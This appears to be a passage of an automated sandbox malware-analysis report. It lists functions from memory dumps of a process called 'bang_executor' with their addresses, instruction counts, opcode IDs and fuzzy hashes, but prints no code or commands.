                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA023F2 Relevance: .4, Instructions: 365COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da617e183be3a61f232a588545428b97e4e302a21d65ddd4c998dbab7b529c0e
                                        • Instruction ID: 0547a641836f21ba8f16e42bbc8c616d53bf80cf175be9cf2d3fd98534d5f680
                                        • Opcode Fuzzy Hash: da617e183be3a61f232a588545428b97e4e302a21d65ddd4c998dbab7b529c0e
                                        • Instruction Fuzzy Hash: 61C1B530B19B4E8FDB99EF68C4A4AA973E1FF59300F140569E45AC72D6CE75E842CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA0204C Relevance: .2, Instructions: 214COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17b95254a41fc941578b684417b93e119c57154575d737d45922be039f2a8d69
                                        • Instruction ID: 290b802d6d00da067e88d4357545572b9d9ede80d6cf118b011d14a7d3b78e75
                                        • Opcode Fuzzy Hash: 17b95254a41fc941578b684417b93e119c57154575d737d45922be039f2a8d69
                                        • Instruction Fuzzy Hash: 8871E730A05B4F8FDB94EF58C491AAB73B2FF59300F604669D45AC72D5CA75E982CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00CA9 Relevance: .2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ded0da20eb3f9114a8835bf98feeb9f28390de2fd536c8b99f1378028fe34afa
                                        • Instruction ID: ecaf1eb70623a077efdbd0e08d648cbbc12a695256381d6fa45f46362e72617b
                                        • Opcode Fuzzy Hash: ded0da20eb3f9114a8835bf98feeb9f28390de2fd536c8b99f1378028fe34afa
                                        • Instruction Fuzzy Hash: E351F231A0E6CE4EE772577448316E57BA1DF47710F0A01BAD4CCCB0A3D8996A1A83A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA02448 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ac43d95816fa64f481adaf92bb47b895703e6f7a2aebbc36cd844499697edf6
                                        • Instruction ID: 180cb339509e897d4ca1c194e2bceea3725298937da2c1fb89db12faaa2fcea1
                                        • Opcode Fuzzy Hash: 0ac43d95816fa64f481adaf92bb47b895703e6f7a2aebbc36cd844499697edf6
                                        • Instruction Fuzzy Hash: 6F517231B09B0E8FDBA9EF58C4A4AAA77E1FF54310F150569E45AC3295CA74E841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA03B5D Relevance: .2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 622a03389ba93fe7b4bcc3fc0553c59fab2b0afb4fa575e4f61f6046460f2293
                                        • Instruction ID: ed4727d5ef13b5fb07dd7af536961700eae6cc2763d9865f3d3c93caa043ffa1
                                        • Opcode Fuzzy Hash: 622a03389ba93fe7b4bcc3fc0553c59fab2b0afb4fa575e4f61f6046460f2293
                                        • Instruction Fuzzy Hash: 3151A171A08B1C8FDB58EF98D8456EDBBF1FB99310F00826BD449D7256CA34A845CBC2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00D15 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3540261ce9c09a80d0b13ab37e4a9ece12610639f0241aaf735f61d7ea568bb6
                                        • Instruction ID: 429f2612443bd36dfaafa79d9755bdde0997d632dda47e92c5022ca094e95f75
                                        • Opcode Fuzzy Hash: 3540261ce9c09a80d0b13ab37e4a9ece12610639f0241aaf735f61d7ea568bb6
                                        • Instruction Fuzzy Hash: A0110522F0A95E4AFBB4A7A848316FA32D0EF46710F4201B6D49DC30E3DD597A1A0295
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA010C9 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd7da1ee2a47aa43dbf3806a51125d2bf2e05425bc79e1333a3c0fe0d4e14d95
                                        • Instruction ID: de5c63e1cd96b09f21014e09713c1fd9c9dd3cfd17c05425ffd4ba32ee404a75
                                        • Opcode Fuzzy Hash: cd7da1ee2a47aa43dbf3806a51125d2bf2e05425bc79e1333a3c0fe0d4e14d95
                                        • Instruction Fuzzy Hash: 09E0E511A0F79A0FE77993AD48623627EE1DB4B500F0581EFD0C9C26E3C8C82C424351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA023BD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b10f31522f70f44ae66d4eb5110fb81c2ed810af4cc5ea898760f18641614c20
                                        • Instruction ID: 32dabc9f255c6d9132281774575ec945037398082ba0d0a82c7019f357d3fb86
                                        • Opcode Fuzzy Hash: b10f31522f70f44ae66d4eb5110fb81c2ed810af4cc5ea898760f18641614c20
                                        • Instruction Fuzzy Hash: CAE0C221F4691E89EB94B3B468B69FEB246DFC5200FC20871E81EC20CBCD6A29110182
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00CF3 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6b4d0d999e243f43ed885040e0c06bef71fa78a4579ea7d5b380534d2f0e7b2
                                        • Instruction ID: 9a3a29237d931110f62a56320acaa9477660f113d4a7354e46f49a436c8f4f94
                                        • Opcode Fuzzy Hash: e6b4d0d999e243f43ed885040e0c06bef71fa78a4579ea7d5b380534d2f0e7b2
                                        • Instruction Fuzzy Hash: CAC0123256D64D57D351AB10E451CEA7350BF90610F841B39F04B410A9DD5566858582
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFD9BA00AA8 Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;N_I$<N_I
                                        • API String ID: 0-1294700092
                                        • Opcode ID: 4886b61e286f1e7f180836ff87ed58b8a98a8b318185dc5022ef71ed8f87b632
                                        • Instruction ID: 2fb920e58f9fdd9f8041f65ab6670639e9dedeb4b2abd0b44addf112d0ad7c43
                                        • Opcode Fuzzy Hash: 4886b61e286f1e7f180836ff87ed58b8a98a8b318185dc5022ef71ed8f87b632
                                        • Instruction Fuzzy Hash: 8A615BD3F0FAC90BE771479C18651282E83AF57A50B5901FBD0C8871BFB881AE0AC385
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA0230E Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {=N_^
                                        • API String ID: 0-135052102
                                        • Opcode ID: 02cc4d7a75c6e015104d7371357cbb2c8d983a5c4d59ab67861ce30ab5fbbae9
                                        • Instruction ID: 76e41b3a71f50bcb6b91c8dd403bd72ffd379427ce61d35f05777ad2b1dd0579
                                        • Opcode Fuzzy Hash: 02cc4d7a75c6e015104d7371357cbb2c8d983a5c4d59ab67861ce30ab5fbbae9
                                        • Instruction Fuzzy Hash: 89E04F31458B084BC354DF18D48049AB7E0FF95320F800B2EF09AC21B5DB7596818A82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA023F2 Relevance: .4, Instructions: 365COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a872eb944453e9da0409e22661c94a8a8a917ddf0a45f969bdee2d131755001e
                                        • Instruction ID: ab3c897538721a0ce819cc3b6bb583a64c123e67541b58afc3114c482f966460
                                        • Opcode Fuzzy Hash: a872eb944453e9da0409e22661c94a8a8a917ddf0a45f969bdee2d131755001e
                                        • Instruction Fuzzy Hash: 23C1C530B19B4E8FDB98EF68C4A4AA973E1FF59300F140569E45AC72D6CE75E842CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00E65 Relevance: .2, Instructions: 230COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c0a0fd1e256ee8c7b85f6b88c138b732d3fe51d306effff77e06412bf2d6a9a
                                        • Instruction ID: 1996ea75b94bcf8d9746f65e368355d67aa9f1f491a906ed7d59dde03a22f926
                                        • Opcode Fuzzy Hash: 8c0a0fd1e256ee8c7b85f6b88c138b732d3fe51d306effff77e06412bf2d6a9a
                                        • Instruction Fuzzy Hash: 1C613A71F2444E4FE794EF6CE465AA9B7A2FFA5740F200175E048CB29ACD7AAC46C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA0204C Relevance: .2, Instructions: 214COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed8ec704c35e40e14bb7f88ac1d4f6123282b5f6a05725d11926915039e3d026
                                        • Instruction ID: 92b8739bbdfcf643a5c875986e4428546129e916915076f2c1c5f59b16fbd0d7
                                        • Opcode Fuzzy Hash: ed8ec704c35e40e14bb7f88ac1d4f6123282b5f6a05725d11926915039e3d026
                                        • Instruction Fuzzy Hash: 27710830A05B4F8FDB94EF58C495AAA73B2FF99300F20466AD459C7295CE35E942CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00CA9 Relevance: .2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dba4bfc6f55b4d1590bfc42368c11ecc0fbf8670190225cb2ee554dfe8506365
                                        • Instruction ID: bbfe0a6c32eaeb4f93d01c3e790bdd4db248a8ac34a8b41160c2cb384662a8f1
                                        • Opcode Fuzzy Hash: dba4bfc6f55b4d1590bfc42368c11ecc0fbf8670190225cb2ee554dfe8506365
                                        • Instruction Fuzzy Hash: E551F531A0E6CD4EE772577848316E57FA1EF93710F1A02BAD4CCCB0A3D85D6A1A8352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA02448 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ac43d95816fa64f481adaf92bb47b895703e6f7a2aebbc36cd844499697edf6
                                        • Instruction ID: 180cb339509e897d4ca1c194e2bceea3725298937da2c1fb89db12faaa2fcea1
                                        • Opcode Fuzzy Hash: 0ac43d95816fa64f481adaf92bb47b895703e6f7a2aebbc36cd844499697edf6
                                        • Instruction Fuzzy Hash: 6F517231B09B0E8FDBA9EF58C4A4AAA77E1FF54310F150569E45AC3295CA74E841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA03B5D Relevance: .2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 622a03389ba93fe7b4bcc3fc0553c59fab2b0afb4fa575e4f61f6046460f2293
                                        • Instruction ID: ed4727d5ef13b5fb07dd7af536961700eae6cc2763d9865f3d3c93caa043ffa1
                                        • Opcode Fuzzy Hash: 622a03389ba93fe7b4bcc3fc0553c59fab2b0afb4fa575e4f61f6046460f2293
                                        • Instruction Fuzzy Hash: 3151A171A08B1C8FDB58EF98D8456EDBBF1FB99310F00826BD449D7256CA34A845CBC2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00D15 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3540261ce9c09a80d0b13ab37e4a9ece12610639f0241aaf735f61d7ea568bb6
                                        • Instruction ID: 429f2612443bd36dfaafa79d9755bdde0997d632dda47e92c5022ca094e95f75
                                        • Opcode Fuzzy Hash: 3540261ce9c09a80d0b13ab37e4a9ece12610639f0241aaf735f61d7ea568bb6
                                        • Instruction Fuzzy Hash: A0110522F0A95E4AFBB4A7A848316FA32D0EF46710F4201B6D49DC30E3DD597A1A0295
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA010C9 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd7da1ee2a47aa43dbf3806a51125d2bf2e05425bc79e1333a3c0fe0d4e14d95
                                        • Instruction ID: de5c63e1cd96b09f21014e09713c1fd9c9dd3cfd17c05425ffd4ba32ee404a75
                                        • Opcode Fuzzy Hash: cd7da1ee2a47aa43dbf3806a51125d2bf2e05425bc79e1333a3c0fe0d4e14d95
                                        • Instruction Fuzzy Hash: 09E0E511A0F79A0FE77993AD48623627EE1DB4B500F0581EFD0C9C26E3C8C82C424351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA023BD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b10f31522f70f44ae66d4eb5110fb81c2ed810af4cc5ea898760f18641614c20
                                        • Instruction ID: 32dabc9f255c6d9132281774575ec945037398082ba0d0a82c7019f357d3fb86
                                        • Opcode Fuzzy Hash: b10f31522f70f44ae66d4eb5110fb81c2ed810af4cc5ea898760f18641614c20
                                        • Instruction Fuzzy Hash: CAE0C221F4691E89EB94B3B468B69FEB246DFC5200FC20871E81EC20CBCD6A29110182
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00CF3 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6b4d0d999e243f43ed885040e0c06bef71fa78a4579ea7d5b380534d2f0e7b2
                                        • Instruction ID: 9a3a29237d931110f62a56320acaa9477660f113d4a7354e46f49a436c8f4f94
                                        • Opcode Fuzzy Hash: e6b4d0d999e243f43ed885040e0c06bef71fa78a4579ea7d5b380534d2f0e7b2
                                        • Instruction Fuzzy Hash: CAC0123256D64D57D351AB10E451CEA7350BF90610F841B39F04B410A9DD5566858582
                                        Uniqueness

                                        Uniqueness Score: -1.00%